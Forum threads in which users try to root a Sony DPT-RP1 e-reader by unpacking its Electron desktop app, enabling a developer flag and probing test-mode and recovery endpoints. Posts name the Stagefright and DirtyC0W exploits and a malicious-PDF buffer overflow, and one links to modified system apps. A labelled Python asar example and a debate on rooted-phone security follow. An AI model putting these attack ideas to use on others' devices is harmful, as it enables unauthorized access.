I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
MarkBell said:
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing (I didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices, but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing (still not exclusively, but mostly so).
Then I said that in the android world it's called rooting (not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing (this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing; I'm saying they aren't the same thing).
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing (I didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices, but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing (still not exclusively, but mostly so).
Then I said that in the android world it's called rooting (not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing (this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing; I'm saying they aren't the same thing).
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
I tend to read too deeply into everything. It's the way I am. Lol.
Sent from my SM-G928T using Tapatalk
Could you please post some information about the USB device, such as the PID & VID?
Do it like this:
Connect the DPT-RP1 to Linux, and then type this command: 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
happy to help with simple things
thisvip said:
Could you please post some information about the USB device, such as the PID & VID?
Do it like this:
Connect the DPT-RP1 to Linux, and then type this command: 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
Bus 001 Device 008: ID 054c:0be5 Sony Corp.
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customers. I guess he did something like directly modifying the eMMC to root it and putting "USBDeviceSwitcher.apk" on it to allow a usual USB connection. Since I don't want to take such a risk, I decided to wait until the first firmware update to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
sartrism said:
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customers. I guess he did something like directly modifying the eMMC to root it and putting "USBDeviceSwitcher.apk" on it to allow a usual USB connection. Since I don't want to take such a risk, I decided to wait until the first firmware update to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 over TCP (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths which get called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like the URL digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
The last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you have finished your modifications you have to pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative URLs look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
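To make the extract / pack steps above concrete, here is an added example, not code from the thread or from Sony's app: a minimal Python reader and writer for the asar container used by Electron apps, run on a constructed two-file archive and applying the config.js edit described above. It assumes an archive without an integrity block, as older asar versions produce.

```python
import json
import struct

# Minimal asar reader/writer (constructed example, not the asar CLI itself).
# Layout: u32 (=4) | u32 header_size | u32 payload_size | u32 json_len
#         | JSON header, zero-padded to 4 bytes | concatenated file bytes.
# header_size counts everything from payload_size to the end of the padding;
# file "offset" values in the JSON are relative to byte 8 + header_size.


def _pad4(n: int) -> int:
    return (4 - n % 4) % 4


def asar_pack(files: dict) -> bytes:
    """Pack {path: bytes} (paths use '/' separators) into an asar archive."""
    header = {"files": {}}
    blobs = []
    offset = 0
    for path, data in files.items():
        node = header["files"]
        parts = path.split("/")
        for d in parts[:-1]:                      # create nested dir entries
            node = node.setdefault(d, {"files": {}})["files"]
        node[parts[-1]] = {"size": len(data), "offset": str(offset)}
        blobs.append(data)
        offset += len(data)
    js = json.dumps(header).encode()
    padded = len(js) + _pad4(len(js))
    # Pickle-style string: payload size, string length, bytes, padding.
    header_pickle = struct.pack("<II", 4 + padded, len(js)) + js + b"\0" * _pad4(len(js))
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(blobs)


def asar_unpack(archive: bytes) -> dict:
    """Return {path: bytes} for every file, walking nested directories."""
    header_size = struct.unpack_from("<I", archive, 4)[0]
    json_len = struct.unpack_from("<I", archive, 12)[0]
    header = json.loads(archive[16:16 + json_len])
    base = 8 + header_size                       # start of the file data region
    out = {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            full = prefix + name
            if "files" in meta:                   # directory entry
                walk(meta, full + "/")
            else:
                start = base + int(meta["offset"])
                out[full] = archive[start:start + meta["size"]]

    walk(header, "")
    return out


def set_devbuild(archive: bytes, enabled: bool) -> bytes:
    """Unpack, flip config.DEVBUILD in lib/config.js, and repack."""
    files = asar_unpack(archive)
    old = b"config.DEVBUILD = %s;" % (b"false" if enabled else b"true")
    new = b"config.DEVBUILD = %s;" % (b"true" if enabled else b"false")
    files["lib/config.js"] = files["lib/config.js"].replace(old, new)
    return asar_pack(files)


# Constructed sample archive standing in for app.asar.
SAMPLE_FILES = {
    "lib/config.js": b"config.DEVBUILD = false;\n",
    "package.json": b'{"name": "sample-app"}',
}
SAMPLE_ARCHIVE = asar_pack(SAMPLE_FILES)
```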
mcplectrum said:
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 over TCP (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths which get called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like the URL digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
The last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you have finished your modifications you have to pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative URLs look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
Hope you get some result from the wifi side. I also realized they use port 8443 but couldn't get as far as you.
For those trying to hack it, here is the link for the already 'hacked' system apps (including the original files) - those of the famous hacked RP1 video. Inside the subfolder S1, there are also the hacked system apps for the DPT-S1, just in case.
https://www.dropbox.com/sh/dvtvokdzrgwjc83/AACXOJA-E56nUpUfiWUOzrM3a?dl=0
George Malas said:
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
The stock device has no web browser, no sd-card, no usb connection, and no typical system. I think SONY was haunted by some security issues maybe because they thought the major users are lawyers or very important people? lol
Any chance to create a buffer overflow PDF to attack RP1's pdf reader?
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
jess91 said:
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
If you're interested and supportive of this then go buy one anyway and apply yourself to going forward figuring out how to get it done. Other than that, you're not supportive, you're just hopeful that someone figures it out and then you'll probably go get one.
DO NOT CONTACT ME VIA PM TO RECEIVE HELP, YOU WILL BE IGNORED. KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This already is amazing. @sartrism: can you maybe give me a hint how to load the files on the RP1? Sorry if this might be a stupid question, but I'm new to android and that stuff.
Paderico said:
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This already is amazing. @sartrism: can you maybe give me a hint how to load the files on the RP1? Sorry if this might be a stupid question, but I'm new to android and that stuff.
Just a little update from my side. I'm currently trying to recreate the steps @mcplectrum was using. It seems that my RP1 also uses other ports. I tried to wireshark the USB and WiFi connection. From that I saw that GET /registration/information is often called for Host: localhost:58052. Moreover, the first call is GET /register/serial_number, also on port 5808. This was via USB.
Trying to trigger the /auth/ call via Telnet returns nothing, unfortunately. But port 8080 is also open. Trying to call digitalpaper.local:8443/auth/ returns nothing in Firefox.
@mcplectrum: how did you get the client_id and what would one need that for?
I also tried to change the config.DEVBUILD to true but that seemed to change nothing at all.
So to sum up what we know:
The device is using some kind of android structure, the source code seems to use the U-Boot bootloader, and all communication is done via a REST Restlet framework. So actually there should be some kind of way to use the Restlet framework to PUT or POST the modified files.
The other option would be to directly flash the eMMC, right? I would take the risk and just load it on my device and see what happens. Any hints on how to do that?

Security-related arguments for root and custom rom usage...

Exodus, a popular, albeit closed-source, crypto wallet app recently stopped working on my device. After a few days of back-and-forth troubleshooting via support, they somehow realized that my device is both rooted and running a custom, open source, community-supported ROM. They told me this was no longer allowed because it is far less secure than running the proprietary ROM. I countered with both personal testimony (back when I had a Blu phone, and a year later they got kicked off Amazon due to spyware streaming customer data out without consent) and the common fact that OEM ROMs are almost always packed full of bloatware and spyware. I countered that installing a reputable open source ROM with only those apps I want and need is better. I argued that root gives me the ability to use AFWall to block outbound access for apps that I don't want having access to the Internet without my permission. I could have argued that continuing to use a 1-2 year old phone that no longer receives security updates when I could use an open source ROM that does is better. I also provided a few public articles showing how frequently apps from the Play Store and other "OEM" stores are caught abusing their users' trust and performing malicious actions. My point was that it's not correct to just automatically assume that having root and using a non-OEM ROM is less secure. That's a falsehood. But that said, I am interested to know what the XDA community thinks about that. And if the XDA community has any facts about custom, open source, community-supported ROMs being more secure than OEM ROMs, I am interested to further arm myself.
And of course, I am completely willing to be instructed by the XDA community that indeed Exodus is right and using a custom ROM and having a rooted phone is completely, inherently, automatically more insecure than using an OEM ROM full of bloatware and spyware, not having root so that any rag-tag app can stream data back to home base, and falling behind with security patches because the vendor is either too slow to release or decides my device is no longer worth supporting.
You can't blame them for not troubleshooting unknown firmware. You changed the playing field.
Less mainstream use and support* is one of the disadvantages of custom roms and rooting.
I run stock and use other methods to kill bloatware. Zero brick risk, little down time and they run well.
I'm not saying don't root etc... but you knew the job was dangerous when you took it.
*this can have potentially far reaching and multifaceted implication$
@blackhawk I'm pretty sure it wasn't broken on my phone. One day I opened the app and it said I needed to update to continue using it. So I thought maybe the app had just failed to automatically update from the Play Store. But shortly thereafter I found it wouldn't update. That led to opening a support ticket with them, which eventually led to them saying it no longer works on rooted devices. Their argument was that they were attempting to protect me. My rebuttal was that I don't want their protection, I want my freedom back. They should focus on making their app as secure as possible and then, if they discover I am running it on a rooted phone, give me a warning box and force me to accept it, but don't just take away my freedom.
The irony of their stance is that they still provide the Linux program. And who doesn't have root access on their Linux computer? Or their Mac or Windows computer, for that matter? I can completely understand if they don't wish to troubleshoot the installation of the Debian package or even the use of the zip on every Linux version out there. I wouldn't either! But that's completely different than saying, "Oh, you have root access to your Linux/Mac/Windows computer? We can't let you use our program anymore." That makes zero sense, and it's the same nonsensical argument they are making for rooted Android phones.
I run stock N10+'s because they're easier to troubleshoot and maintain, and it doesn't trip the Knox efuse. I have to add a package disabler and do some optimizing, but it's child's play for me to do it at this point.
Unfortunately if you root you're going to have to suck it up and do the work needed to optimize it.
Same thing I do with stock but with more tools at your disposal... after the learning curve.
This learning curve, the chance of bricking and the damage that can be inadvertently done to the OS with no access restrictions are some of the downsides. Rooting takes time to learn and perfect. With unlimited power, blah, blah, blah.
I'd rather just do basic infrequent troubleshooting and have fun... my current load is over 1.5 yo, still fast and stable.
I don't update the firmware because that breaks things. No updates needed once you optimize it and find any needed work arounds... it's good to go. Anything from Pie up is pretty secure; they have some vulnerabilities but in practice this isn't an issue... unless you do something stupid.
